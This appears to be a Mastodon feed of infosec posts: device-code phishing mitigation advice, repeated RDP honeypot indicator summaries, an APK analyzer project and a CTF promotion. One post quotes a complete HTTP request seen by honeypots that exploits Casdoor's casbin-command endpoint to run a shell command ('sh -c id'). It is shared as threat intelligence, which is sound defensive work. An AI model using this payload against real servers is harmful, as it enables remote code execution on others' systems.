Mastodawn

Your org should be activating Entra ID conditional access policies to outright block device code authorizations with a carveout for very limited use cases such as meeting room conferencing devices. Even Microsoft knows this and has specific guidance on how to enforce it. Device code phishing is hot right now and these device code phishing-as-a-service platforms will likely lower the barrier of entry.

https://blog.sekoia.io/new-widespread-eviltokens-kit-device-code-phishing-as-a-service-part-1/

https://learn.microsoft.com/en-us/entra/identity/conditional-access/policy-block-authentication-flows

#phishing #eviltokens #soc #dfir #threathunting #cti #threatintel

New widespread EvilTokens kit: device code phishing as-a-service - Part 1

Uncover the new sophisticated EvilTokens device code phishing as-a-service, with AI-augmented features facilitating BEC fraud

Sekoia.io Blog

RDP Snitch 2h ago

2026-03-31 RDP #Honeypot IOCs - 705 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
143.198.111.35 - 495
143.110.190.12 - 36
80.66.83.75 - 27

Top ASNs:
AS14061 - 531
AS216473 - 42
AS396982 - 36

Top Accounts:
hello - 531
Administr - 39
Domain - 36

Top ISPs:
DigitalOcean, LLC - 531
Bashinskii Vadim Ruslanovich - 42
Google LLC - 36

Top Clients:
Unknown - 705

Top Software:
Unknown - 705

Top Keyboards:
Unknown - 705

Top IP Classification:
hosting & proxy - 495
Unknown - 102
hosting - 96

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

RDP Snitch 2h ago

2026-03-31 RDP #Honeypot IOCs - 470 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
143.198.111.35 - 330
143.110.190.12 - 24
80.66.83.75 - 18

Top ASNs:
AS14061 - 354
AS216473 - 28
AS396982 - 24

Top Accounts:
hello - 354
Administr - 26
Domain - 24

Top ISPs:
DigitalOcean, LLC - 354
Bashinskii Vadim Ruslanovich - 28
Google LLC - 24

Top Clients:
Unknown - 470

Top Software:
Unknown - 470

Top Keyboards:
Unknown - 470

Top IP Classification:
hosting & proxy - 330
Unknown - 68
hosting - 64

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

RDP Snitch 2h ago

2026-03-31 RDP #Honeypot IOCs - 235 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
143.198.111.35 - 165
143.110.190.12 - 12
80.66.83.75 - 9

Top ASNs:
AS14061 - 177
AS216473 - 14
AS396982 - 12

Top Accounts:
hello - 177
Administr - 13
Domain - 12

Top ISPs:
DigitalOcean, LLC - 177
Bashinskii Vadim Ruslanovich - 14
Google LLC - 12

Top Clients:
Unknown - 235

Top Software:
Unknown - 235

Top Keyboards:
Unknown - 235

Top IP Classification:
hosting & proxy - 165
Unknown - 34
hosting - 32

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

Niels Heinen 8h ago

There seems to be a remote code execution issue in Casdoor? My honeypots are seeing these scans:

GET /api/run-casbin-command?language=exec&args=["enforce","-m","[request_definition]\nr = sub, obj, act\n\n[policy_definition]\np = sub, obj, act\n\n[role_definition]\ng = _, _\n\n[policy_effect]\ne = some(where (p.eft == allow))\n\n[matchers]\nm = r.sub == p.sub","-p","p, x, x, x","sh","-c","id"]&t=2026-03-30T16:12:50Z&m=1191e3dce3682e9382680387ffe783bb87cd213a48f4f1fa6c10644d039f4dc6 HTTP/1.1
Host: x.x.x.x:8000
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15

#casdoor #honeypot #infosec #dfir #cybersecurity

Chris Sanders 🔎 🧠12h ago

Investigation Scenario 🔎

A user reports their hard drive is full, but they don't know why. While investigating, you find a series of large, password-protected RAR files that the user knows nothing about.

What do you look for to investigate whether an incident occurred?

#InvestigationPath #DFIR #SOC

𝕯𝖎𝖓𝖊𝖘𝖍 🇮🇳21h ago

Day 10 of #100VibeProjects 🔍

Built a local web tool that does static security analysis of Android APKs — upload an APK and get a report covering permissions, hardcoded secrets, SDK fingerprinting, cert pinning, and crypto posture.

The interesting part: the methodology came from reverse-engineering the WhiteHouse app teardown that went viral last week. Applied the same five-gate analysis framework to a real banking app.

Found an expired certificate pin (silently disables TLS pinning for all users), a session replay SDK with no confirmed masking rules, and four Adobe tracking SDKs doing cross-device user stitching.

The tool runs entirely locally. No data leaves your machine. APK deleted after analysis.

Stack: Python · Flask · androguard · 380 lines

📝 Blog: mrdee.in
https://mrdee.in/writing/vibecoding-day010-offline-apk-security-analyzer/

💻 GitHub Repo: https://github.com/mr-dinesh/Offline-APK-Analyzer

#VibeCoding #AppSec #AndroidSecurity #MobileSecurity #Python #Flask #DFIR #InfoSec #ReverseEngineering #CyberSecurity

Vibecoding-Day010-Create offline web tool for static security analysis of Android APK files

Building an Offline APK Security Analyzer in Flask Project #10 of the 100 Vibe Coding Projects challenge I’ve been doing APK security analysis manually for years — pulling the file, running jadx, grepping through decompiled source, eyeballing the manifest. It works, but it’s slow and the output lives in a terminal window that disappears the moment you close it. This week’s project: wrap that entire methodology into a local web tool. Upload an APK, get a structured risk report in your browser. No internet required, nothing stored, APK deleted the moment analysis completes.

Dee's Digest

icanhaspii 23h ago

Free Daily Bug Bounty CTF! Ever wondered what it’s like to be a #BugBounty hunter? Come see what I’ve been up to at https://bugforge.io! New #CTF challenge every day, plus a weekly, more advanced one! I also created a new blog: https://icanhaspii.wixsite.com/bugforge where I post my write-ups. #DFIR

RDP Snitch 1d ago

2026-03-30 RDP #Honeypot IOCs - 681 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
143.198.111.35 - 495
80.66.83.74 - 27
80.94.95.221 - 21

Top ASNs:
AS14061 - 495
AS396982 - 45
AS204428 - 45

Top Accounts:
hello - 510
Administr - 54
Domain - 45

Top ISPs:
DigitalOcean, LLC - 495
Google LLC - 45
SS-Net - 45

Top Clients:
Unknown - 681

Top Software:
Unknown - 681

Top Keyboards:
Unknown - 681

Top IP Classification:
hosting & proxy - 495
Unknown - 117
hosting - 51

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

RDP Snitch 1d ago

2026-03-30 RDP #Honeypot IOCs - 454 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
143.198.111.35 - 330
80.66.83.74 - 18
80.94.95.221 - 14

Top ASNs:
AS14061 - 330
AS396982 - 30
AS204428 - 30

Top Accounts:
hello - 340
Administr - 36
Domain - 30

Top ISPs:
DigitalOcean, LLC - 330
Google LLC - 30
SS-Net - 30

Top Clients:
Unknown - 454

Top Software:
Unknown - 454

Top Keyboards:
Unknown - 454

Top IP Classification:
hosting & proxy - 330
Unknown - 78
hosting - 34

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security